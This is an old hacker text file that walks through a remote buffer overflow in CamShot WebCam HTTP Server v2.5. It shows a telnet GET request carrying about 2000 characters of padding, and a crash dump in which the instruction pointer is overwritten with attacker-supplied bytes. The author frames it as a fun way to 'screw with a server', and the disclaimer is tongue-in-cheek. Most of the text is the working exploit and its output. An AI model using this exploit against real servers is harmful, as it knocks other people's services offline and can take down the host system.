52 lines
1.5 KiB
Plaintext
52 lines
1.5 KiB
Plaintext
#Kill a Cam Version 1x
|
|
#Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
|
|
----------------------------------------------------------------
|
|
|
|
#Intro
|
|
_ So im sure you might have seen this little trick.. but if you havent, its a rather funny
|
|
way to screw with a server running CamShot WebCam HTTP Server v2.5. As always, this is
|
|
for you information only, hacking is bad, it make mes cry... im starting to cry thinking
|
|
about it now.. see what you've done??!
|
|
|
|
#Affects
|
|
_ As far as I know, for sure it affects Win9x, I am yet to find an NT, ME, or 2000 box
|
|
running it.
|
|
|
|
#The Code
|
|
[lucid@localhost]$ telnet www.test.com 80
|
|
Trying test.com...
|
|
Connected to www.test.com
|
|
Escape character is '^]'.
|
|
GET (buffer) HTTP/1.1
|
|
(enter)
|
|
(enter)
|
|
|
|
#Why
|
|
_ (buffer) is about 2000 charicters, requesting this cuases the server to over flow
|
|
itself, and in time, crashing the software, ( once or twice on my test machine it killed
|
|
the system as well ).
|
|
|
|
#What They See
|
|
CAMSHOT caused an invalid page fault in
|
|
module <unknown> at 0000:61616161.
|
|
Registers:
|
|
EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246
|
|
EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058
|
|
ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff
|
|
EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000
|
|
Bytes at CS:EIP:
|
|
|
|
Stack dump:
|
|
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
|
|
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8
|
|
|
|
|
|
#Closing
|
|
_ Yes its a lame little exploit bu its fnny none the less. Again only use this on yourself
|
|
would wanna make me cry again.
|
|
|
|
Lucid
|
|
Phreak2000.com
|
|
|
|
|